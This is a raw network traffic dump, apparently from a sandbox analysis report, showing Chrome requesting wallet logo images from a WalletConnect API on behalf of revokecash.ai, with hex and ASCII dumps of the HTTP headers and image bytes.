                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:25 UTC947INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 37 32 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 64 31 32 63 37 36 64 62 30 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:25 GMTContent-Type: image/pngContent-Length: 3727Connection: closeCF-Ray: 8336f3d12c76db01-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Cache-Control: public, max-ag
                                                                          2023-12-10 16:44:25 UTC422INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 03 00 00 00 b7 61 c6 fe 00 00 02 b8 50 4c 54 45 47 70 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: PNGIHDRaPLTEGpL
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 57 55 57 e8 e8 e8 f9 f9 f9 20 21 1f 39 39 39 42 42 42 d5 d5 d5 70 70 70 da da da 2f 2f 2f f5 f5 f5 05 04 05 05 05 05 6f 6e 6f 0a 0a 0a 86 86 86 77 78 77 90 90 90 fa fa fa 6f 6f 6f 87 87 87 02 02 02 40 40 40 ed ed ed 58 58 58 3a 3a 3a 34 34 34 21 21 20 11 11 0f 13 13 13 74 75 74 38 38 38 5a 58 5a 20 20 20 f0 f0 f0 95 95 95 fe ff fe 79 79 79 d4 d4 d4 d9 d9 d9 fe fe fe fb fb fb 92 92 92 d6 d6 d6 1e 1f 1d 03 03 03 d1 d1 d1 79 7a 79 25 25 23 58 57 58 6b 6c 6b 2b 2c 2b 71 71 71 30 31 30 6d 6e 6d 70 6e 70 6b 6b 6b 01 01 01 27 27 27 41 41 41 23 23 23 08 08 08 d0 d0 d0 70 6f 70 37 37 36 49 49 49 59 58 58 8a 8a 8a 86 87 86
                                                                          Data Ascii: WUW !999BBBppp///onowxwooo@@@XXX:::444!! tut888ZXZ yyyyzy%%#XWXklk+,+qqq010mnmpnpkkk'''AAA###pop776IIIYXX
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 6e 7c e7 b0 d5 1b cf 1d d3 f1 58 6a 09 72 b4 d5 72 17 c3 dd f8 a6 f5 1b 8f ea 78 2c b5 04 d9 67 fd 61 0f 86 bb f1 a0 f5 1b f7 e9 78 2c 19 44 1f 06 31 83 41 f4 62 10 33 18 c4 87 41 cc 60 10 bd 18 c4 0c 06 f1 61 10 33 18 44 2f 06 31 83 41 7c 50 83 5c b9 fa ac 76 17 4e 85 bb f1 d4 05 fd ab ae 5e b1 45 90 cb 47 6e 3c a7 db f1 13 e1 6e 3c 71 5c fb a8 1b 47 2e db 22 c8 a5 43 3a ae 69 07 87 2e d9 22 c8 81 fd 3a ae 69 07 fb 0f 30 08 14 06 01 c3 20 60 18 04 0c 83 80 61 10 30 0c 02 86 41 c0 30 08 18 06 01 c3 20 60 18 04 0c 83 80 61 10 30 0c 02 86 41 c0 30 08 18 06 01 c3 20 60 18 04 0c 83 80 61 10 30 0c 02 86 41 c0 30 08 18 06 01 c3 20 60 18 04 0c 83 80 61 10 30 0c 02 86 41 c0 30 08 18 06 01 c3 20 60 18 04 0c 83 80 61 10 30 0c 02 86 41 c0 30 08 18 06 01 c3 20 60 18
                                                                          Data Ascii: n|Xjrrx,gax,D1Ab3A`a3D/1A|P\vN^EGn<n<q\G."C:i.":i0 `a0A0 `a0A0 `a0A0 `a0A0 `a0A0 `
                                                                          2023-12-10 16:44:25 UTC567INData Raw: a8 4c be 7d 22 ee e1 4c 43 10 97 37 5d 7a 8f d3 4d b8 5f 19 0d 1f 2f 3d c8 e9 d6 25 04 05 71 8d 18 20 bd c8 d9 62 d6 a8 60 09 8f 49 4f 72 b6 c9 03 3b 05 51 c9 f9 d2 9b 9c 2c bf a6 73 0f 95 98 2d 3d ca c9 66 4d e9 12 44 4d 9d 2d bd ca b9 72 aa bb f6 50 d1 d3 e6 4a ef 72 aa 3c 6f 6c 37 41 54 c2 1c e9 61 0e b5 f1 5b d3 bb eb a1 54 f9 60 e9 69 ce 94 34 a3 fb 1e ca 55 97 2a bd cd 89 e2 2a a3 7b 08 a2 a2 0a f8 0e 4a bf 8b 29 48 ec a9 87 52 eb e7 a5 48 ef 73 9a 94 f9 33 7b ee a1 54 6e a1 f4 40 a7 29 cc bd 53 0f e5 aa e5 b7 72 fb d5 82 5a d7 1d 83 a8 e8 ca 2d d2 1b 9d a4 d9 db e3 13 ba 5f 62 da 66 e9 95 ce 11 57 3f a4 b7 1e 4a 6d aa e2 cd 6f 3f 49 ad 8a ea bd 87 52 51 8b 58 a4 5f a4 2e 0a a9 87 52 51 55 71 d2 5b 9d 20 2e b4 bf 1f be 22 f5 cd d2 6b 23 df 96 fa 90
                                                                          Data Ascii: L}"LC7]zM_/=%q b`IOr;Q,s-=fMDM-rPJr<ol7ATa[T`i4U**{J)HRHs3{Tn@)SrZ-_bfW?Jmo?IRQX_.RQUq[ ."k#


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          42192.168.2.549757104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:24 UTC748OUTGET /w3m/v1/getWalletImage/b6ee4efc-f53e-475b-927b-a7ded6211700?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:25 UTC946INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 77 65 62 70 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 31 39 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 64 31 33 38 32 31 64 61 39 62 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 67 65 3a 20 31 32 30 32 35 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:25 GMTContent-Type: image/webpContent-Length: 9194Connection: closeCF-Ray: 8336f3d13821da9b-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Age: 12025Cache-Control: p
                                                                          2023-12-10 16:44:25 UTC423INData Raw: 52 49 46 46 e2 23 00 00 57 45 42 50 56 50 38 20 d6 23 00 00 f0 9d 00 9d 01 2a 90 01 90 01 3e 49 24 8f 45 22 a2 21 94 29 bc 9c 28 04 84 b1 b7 7e 1a 2e 08 af 7c 61 ed e2 93 94 08 73 ff 9f d9 d1 9e bc 57 f7 7f d9 9f cb 7f 9a 9b 33 f7 cf ec 5f a4 bf 2d fe 63 f5 e9 d8 de 60 7c c3 fe ef f3 73 fc 4f cb 6f fb 5e a8 3f 4f ff c2 f7 06 fd 40 ff 3d fd e7 fc af ec af c5 df e8 07 c0 2f dd 2f 50 ff ad bf ec ff b7 7e ff fc ba ff cc fd 97 f7 89 fd f3 fc 87 fd af d8 0f 90 0f ec 7f dd 7e ff fb d7 ff 6e 7d 82 bf 91 ff 7f ff d3 eb 97 fb 77 ff 93 e5 8f f6 cf f6 f7 e0 73 f9 e7 f8 7f fe bf ed fd c0 3f ff fb 72 f4 7b f5 bb fd 47 f7 4f 5f fe 06 fe 97 fb a7 9f fe 60 fc c9 ed af 33 9e a0 f3 23 f8 cf db ff e2 7f 8a fd cc f8 c7 fc ff 7b bc 00 bf 1c fe 95 fe 6f f2 e7 f2 eb 8e 0e 6d 7d
                                                                          Data Ascii: RIFF#WEBPVP8 #*>I$E"!)(~.|asW3_-c`|sOo^?O@=//P~~n}ws?r{GO_`3#{om}
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: ea 40 e6 da b3 8f b1 16 c5 41 20 9d 09 4f 05 e8 a8 57 87 2b f5 76 21 da 59 6f d4 7e 0e 9f 30 2e ad 68 c0 9f cc 65 45 dc 57 90 35 90 61 3e 71 44 11 e1 c4 1e 0d 11 64 c6 4a c8 47 2c 6a da bd f6 9f 30 6d 63 e2 dd 50 17 13 73 60 ff b2 6f 1c 88 22 fe e1 62 0d 57 8f 27 65 3b d5 57 93 78 3e 25 22 27 c0 76 a1 28 a0 34 1f 25 67 a7 cc 1b 57 be d3 e6 01 bb 10 b3 08 0f e8 6d 01 c2 88 e0 d8 45 a7 cc 1b 57 be d3 d7 89 81 4d fc 24 2f 0d 39 10 0d 4f 56 54 c3 46 71 17 d4 ef 9a 78 30 27 f5 48 68 82 a4 cc 94 93 e8 fd 3b 6b da a6 18 d3 59 e1 e5 3c f2 c6 8f 61 d6 70 97 73 8f 00 62 58 ea 7d db 3c 3c 1e a1 f7 db 14 e6 58 be 45 26 7a 5e e6 bf cf 95 69 02 22 76 6c c7 49 74 ff a0 48 de 1b 20 5c 61 ac 37 d1 ed 21 fe 42 99 0a 52 3f e2 00 c3 b8 69 4c bd 2b 72 10 6a 63 67 94 f7 7c e8
                                                                          Data Ascii: @A OW+v!Yo~0.heEW5a>qDdJG,j0mcPs`o"bW'e;Wx>%"'v(4%gWmEWM$/9OVTFqx0'Hh;kY<apsbX}<<XE&z^i"vlItH \a7!BR?iL+rjcg|
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 4c 9d 3f cc b3 13 23 9e 7e b4 d5 2e 88 af 41 ab 0b eb b7 d5 1a 0e 0b 01 35 10 87 fc 42 12 06 72 10 f2 ab 5d d7 21 43 de 97 ac 46 70 d3 c9 13 bc a7 d4 2e d9 95 bb 61 ad 6a 2a 4e e8 ad b4 31 cd b9 4f d0 bd 32 02 37 91 fe f5 d5 fc 60 25 f1 39 71 30 89 be 48 f4 85 cc b7 87 aa 70 62 fd c1 10 ce 61 1e 0f ea 20 e3 94 e6 d1 52 bf 0b 36 14 0f 8d fa 4f fa 40 86 29 99 43 8f 74 f5 56 7b 26 3c 2a a3 11 f6 7b 0d 0d b8 bd 54 89 c2 3d 36 9c 60 28 20 d0 23 bd 90 bf 2c f7 ec 2f 7c 3e 7e 6e fe f3 2a e6 cf 9d 21 da bc 26 22 20 71 31 29 2c a5 c2 68 21 81 d5 27 7f 79 7f 19 e6 57 c5 a2 77 d1 8e fa 89 d9 4f b7 35 28 0b 65 75 2b e8 ad f4 3b 35 7c aa bd 39 e9 1e 15 b3 e1 30 d6 34 d8 2d a1 66 17 ab fe a3 70 ca df 5a 96 39 bb b4 ab c3 d6 66 88 33 1f a1 02 b4 6d 5a 52 86 db c5 06 77
                                                                          Data Ascii: L?#~.A5Br]!CFp.aj*N1O27`%9q0Hpba R6O@)CtV{&<*{T=6`( #,/|>~n*!&" q1),h!'yWwO5(eu+;5|904-fpZ9f3mZRw
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: af 82 91 92 63 c3 f0 7e da 6d 63 cb 0b 2a 29 ba b6 f9 12 af 3d c2 1d ed 96 60 ae d4 51 8f 24 c6 0e fd c6 2d 30 00 f7 42 56 6b d5 bf 58 47 db dc 16 0f 36 fe 75 65 9c cb 13 a0 74 1f 13 d0 c7 7f 0e f0 d6 e8 99 ec 88 95 7b 3f 21 e3 2e d9 b2 c7 96 93 be b0 ef 6f 21 1d 09 2b 7d 40 c8 13 08 4f e1 a4 02 3b db 4e 99 a9 b0 f4 19 48 49 fa b5 37 c4 73 90 98 fb 2d ef b4 89 9a 6d 9c 39 80 f6 2d 24 d3 ad d3 f8 d4 df e2 ea 1c 6d 2a b7 fc de ba 08 11 f8 29 25 0d b1 15 3a fe 5a e0 b7 0c df 13 2e 4c 87 9c 54 b9 56 d8 4f 25 d7 e1 b9 47 84 36 04 99 bb cf 06 a9 59 8f 8f af a8 7b 48 5a 09 25 fe a0 6a f4 a2 a5 51 97 db 9e c0 c5 13 1c 45 ed c3 f9 b9 4f 64 1e 36 fb ef f3 ca 1a 79 d7 2c 07 bd 85 79 fe 2b 4f 53 bc 69 12 eb 30 8d 76 ae 21 47 7b 81 fb 7a 75 13 7d e6 28 d8 a8 ff f6 c0
                                                                          Data Ascii: c~mc*)=`Q$-0BVkXG6uet{?!.o!+}@O;NHI7s-m9-$m*)%:Z.LTVO%G6Y{HZ%jQEOd6y,y+OSi0v!G{zu}(
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 38 27 21 56 6f ad 44 7b d4 79 bc a4 1e f4 5c 2a 15 b0 25 be 97 bb ea 26 89 9f e6 90 b8 d5 62 0b f6 4e 39 72 d8 5c 3e 7d bd 9e 99 e7 b7 1c 78 44 28 7d 2d 26 ad 9c e7 47 d9 49 36 9a 09 8b fe 13 3f 6a 1e 42 e9 c9 8c 6e 38 28 f5 fa ed ac 9f 21 6b b4 0d 50 49 63 03 96 c4 3f 21 47 b0 ca 76 12 89 01 2e a0 4b 79 22 b4 8e 7e 69 e0 be b4 29 22 7e 04 49 f2 a6 7e b6 1a 80 b2 01 db 87 9d d3 ae 51 f5 72 0f f0 94 cb 66 96 da 2e 1a a6 3b 08 c2 b3 14 67 2f 13 8b 86 92 24 1d 77 c6 f8 2d 72 4c 2b 72 3b b8 46 74 97 26 d5 ae b4 a7 da 48 48 32 99 42 fb 90 3b b1 70 19 bd 1d c5 94 c6 3a d8 43 ea 22 eb 50 8e 0f 3b 96 1b 08 af 94 2f 23 b9 43 fd fc 9c 4e 2e 07 9a ee f7 ac ea c0 07 9e b9 65 60 8f 3e 31 05 fc 4c f0 be c9 94 ec 84 09 eb ed c0 03 20 a5 ce 51 c0 56 68 f8 6f 6c b3 2f 7f
                                                                          Data Ascii: 8'!VoD{y\*%&bN9r\>}xD(}-&GI6?jBn8(!kPIc?!Gv.Ky"~i)"~I~Qrf.;g/$w-rL+r;Ft&HH2B;p:C"P;/#CN.e`>1L QVhol/
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: 12 a4 ff 9e 13 1b e0 54 32 15 06 cf d9 b8 7d 6f 9f b1 8a ed 36 ec 29 d6 e1 d2 2c 3c fa ac e9 e8 92 02 0d c2 7c 3a 39 bf a0 1f 13 1e 4e ea bb cf 87 4b f0 f9 f1 dd b5 c0 92 5f af 1a 6d b7 0e 22 fe 8e 94 b7 0e 25 4f 4e c9 fe b4 88 b0 c7 6d e8 85 15 c5 1e df e8 d7 50 3f 26 55 f2 b5 f5 3f 3a a1 a0 44 a8 b0 bf 17 34 5d df fc a9 18 e0 23 fe 59 e4 aa d2 0f 4f 23 bf 30 28 cb e1 51 e0 d7 bd 16 a2 f8 7e f5 43 c3 d6 53 0b 3b 97 41 0b 93 95 01 7d 7e 23 32 99 13 14 6b 14 0f b0 c7 81 68 4b bd 59 f9 7b 27 4d b0 3a e9 05 64 4f 4c 6f d1 30 cd 30 af a9 14 d9 ea b3 10 41 8a 23 d8 11 f2 7f f3 fb 71 45 30 e9 a0 7b 3c 57 2a 7c ea a3 71 c1 ed d1 bb 4f f4 8c 07 27 25 c9 9f cc b2 f7 0e ac 5a 82 dc 2a 9e 2e 86 47 cd 95 d6 31 45 11 bf 50 67 65 7b b6 30 f8 34 26 5f 13 a5 93 71 76 e7
                                                                          Data Ascii: T2}o6),<|:9NK_m"%ONmP?&U?:D4]#YO#0(Q~CS;A}~#2khKY{'M:dOLo00A#qE0{<W*|qO'%Z*.G1EPge{04&_qv
                                                                          2023-12-10 16:44:25 UTC1369INData Raw: a9 5e f8 ce 1a 60 4d f7 0a 0a 50 4d 97 de 4f 52 fb 1c f6 0e ce 8b c9 3d bd b3 17 74 df ac df 09 51 d3 b5 a4 bf 39 ef ac 47 7d 10 d5 4f 2b f3 a0 63 3d 7e e9 0b 24 98 20 7a 7b 81 7d ed 04 60 f2 5c ff 80 43 bf 8d 22 08 a3 27 c9 6f 5e 47 81 8e 07 4c 03 df e4 3e 13 7f 4e f3 1c 9c 5f b2 c2 48 11 2f e3 d2 b1 f1 3d f9 c1 24 e9 e7 1b 9c 52 df 93 43 2e e4 b3 61 33 82 cf b7 c6 88 84 44 c6 9b 8a 9e bf 7b 13 f9 fd 5d bd e5 54 e6 0d 07 60 dd 9d d0 c2 a2 32 74 1b a9 70 af 30 96 cb 29 70 66 72 3b a6 bc 25 5c 54 b2 f6 42 77 ea 0e 47 e9 f3 bf b6 68 74 8b 89 e9 16 02 da 63 47 78 0e 93 68 f5 71 bd bc 14 ef 67 77 01 2c d8 64 82 5a 8b 9c c9 52 45 e6 97 dc 1c cb 42 dd a2 8a 38 0f 67 d4 c8 3d e9 2c 9c 91 ba 5c 2b 99 46 5b a3 70 6e 2d f5 33 d2 d4 57 95 8a 20 0a 1a be e4 94 d1 92
                                                                          Data Ascii: ^`MPMOR=tQ9G}O+c=~$ z{}`\C"'o^GL>N_H/=$RC.a3D{]T`2tp0)pfr;%\TBwGhtcGxhqgw,dZREB8g=,\+F[pn-3W
                                                                          2023-12-10 16:44:25 UTC557INData Raw: 6b bf 27 3a cc 24 06 74 0d b8 a2 ac 45 d7 86 53 58 a5 e5 57 84 8e 24 86 f9 5e 1e 20 43 a0 4e f0 6d 99 b4 1d ed 6c dc ac 4d 41 eb 07 a5 03 40 13 ad 36 de bc ad e3 39 d2 f0 62 2e 08 28 84 6d ed ec dc 23 f8 db 85 1d a6 c7 9c 83 d9 e3 d3 6b 7f 69 79 60 5e 2e a7 78 d3 e5 4d 79 30 07 6f e6 05 05 d0 95 b8 b7 16 75 92 7a 95 7a 07 6a 0a 93 9d 0a ba fa d0 a9 75 0e 1f b7 c7 d9 75 29 fa 61 dc 76 50 c7 f6 d0 ed 5f fc 05 44 e0 da 7e f8 77 95 e6 61 b6 07 22 7f 2a 06 07 43 7d 89 3d 6e 62 8d 67 78 82 5f 4d c0 83 23 5c d0 9c 55 09 c6 e0 09 6b 61 25 22 cb a9 67 c8 ef 5f 9b 66 61 36 7c 6a 33 b3 8f 9d b7 a9 b1 66 c5 b9 77 e2 29 b9 94 04 c4 df 7a e3 e6 2c 45 44 d0 78 95 4d 6c 0d 38 8e 36 95 e5 60 18 df a6 61 b8 f1 86 f8 bb 08 4b 91 cf 18 5b 88 f1 93 a4 6d 2c b2 2f f6 c2 30 47
                                                                          Data Ascii: k':$tESXW$^ CNmlMA@69b.(m#kiy`^.xMy0ouzzjuu)avP_D~wa"*C}=nbgx_M#\Uka%"g_fa6|j3fw)z,EDxMl86`aK[m,/0G


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          43192.168.2.549758104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:24 UTC487OUTGET /w3m/v1/getWalletImage/c39b3a16-1a38-4588-f089-cb7aeb584700?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:26 UTC931INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 35 30 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 64 31 33 65 31 64 34 63 31 66 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:26 GMTContent-Type: image/jpegContent-Length: 8503Connection: closeCF-Ray: 8336f3d13e1d4c1f-MIACF-Cache-Status: MISSAccept-Ranges: bytesAccess-Control-Allow-Origin: *Cache-Control: public, max-
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 01 90 01 90 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 02 01 03 06 07 08 05 04 ff c4 00 40 10 00 02 02 01 03 02 04 03 02 0c 04 05 05 00 00 00 00 01 02 03 04 05 06 11 07 21 12 31 41 51 13 22 61 14 71 15 23 32 42 52 62 73 81 91 a1 b1 c1 08 26 36 d1 33 34 53 72 e1 24 a2 b2 f0 f1
                                                                          Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("@!1AQ"aq#2BRbs&634Sr$
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 0b e2 2d 1c 6a f4 93 b7 7a f5 86 2d 56 3e 7c 7f 47 50 02 35 cd 59 08 ce 2f 94 d7 28 91 ca d0 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 63 33 26 bc 6c 7b 2e b6 4a 35 c2 2e 52 6f d1 15 c9 b1 d7 57 88 d1 dd 73 de d3 af 1f f0 16 0d 9c 5b 3e f9 12 8b f2 5e c6 ff 00 0e d0 5f 5f 9e b8 69 eb df e5 0c 98 b1 ce 4b 72 c3 5d f5 6b 78 d9 ba 75 d9 c6 99 3f b0 d0 dc 2a 8a 7e 7f 53 73 74 0b 41 5a 66 d2 af 22 d8 f1 6e 5b f8 8f 9f 34 bd 17 f3 39 d3 6f e9 b2 d5 35 bc 3c 38 26 dd b6 24 f8 f4 47 66 68 98 70 c2 c4 c7 c6 ad 25 0a 6b 50 5c 7d 0f 5f e2 6b d3 47 a3 c7 a1 c3 d2 3f 68 fe db ba b9 8c 74 8c 75 7a 80 a7 3f 37 05 4f 02 8e 08 db 17 2a a7 15 e6 e2 d1 59 3e 38 2a 07 18 6f 78 35 bb f5 44 fc d5 cd 1e 44 62
                                                                          Data Ascii: -jz-V>|GP5Y/(c3&l{.J5.RoWs[>^__iKr]kxu?*~SstAZf"n[49o5<8&$Gfhp%kP\}_kG?htuz?7O*Y>8*ox5DDb
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 71 ce 4b c5 61 ac 77 a6 b9 6e bb ab d9 6c a4 dd 30 6d 41 7d 0c 13 5a d5 15 1c d3 8e d3 b3 d6 4b f3 49 6b da cc 6b f1 63 61 cb 99 79 4a c5 e9 f4 46 2e db 6d b7 dd b3 af 68 74 51 8e 91 1b 6d 11 da 13 91 b5 63 96 a4 9b 93 6d be 5b f5 00 12 aa 3e 9d 37 32 cc 0c ea 72 a8 6d 4e b9 29 2e e7 63 74 cf 74 55 ad e8 b8 a9 3e 65 28 72 9f f6 38 bf 93 6e 74 13 75 fe 0a d5 e5 83 91 cc a1 34 e5 5a e7 d4 f3 5e 27 e1 d1 ab d2 ce 4a c7 bd 56 b6 a7 1f 3d 77 f8 3a 67 5e d5 e8 d1 b4 fb 32 b2 9a 50 82 6f b9 c7 7d 4e de 39 1b c3 70 59 91 39 49 62 54 dc 69 87 a2 5e e6 67 d7 3e a0 cf 59 c9 fc 13 81 2f 05 35 ff 00 c5 71 7e 6f d8 d3 86 a7 85 f8 24 69 71 fb 56 68 f7 e7 b7 ca 3f b5 9a 5c 1c 91 cd 3d c0 01 ec 1b 80 00 00 00 01 7b 0b 1e 79 79 74 e3 d4 b9 9d 92 51 4b ef 2c 9b 2f a1 7b 72
                                                                          Data Ascii: qKawnl0mA}ZKIkkcayJF.mhtQmcm[>72rmN).cttU>e(r8ntu4Z^'JV=w:g^2Po}N9pY9IbTi^g>Y/5q~o$iqVh?\={yytQK,/{r
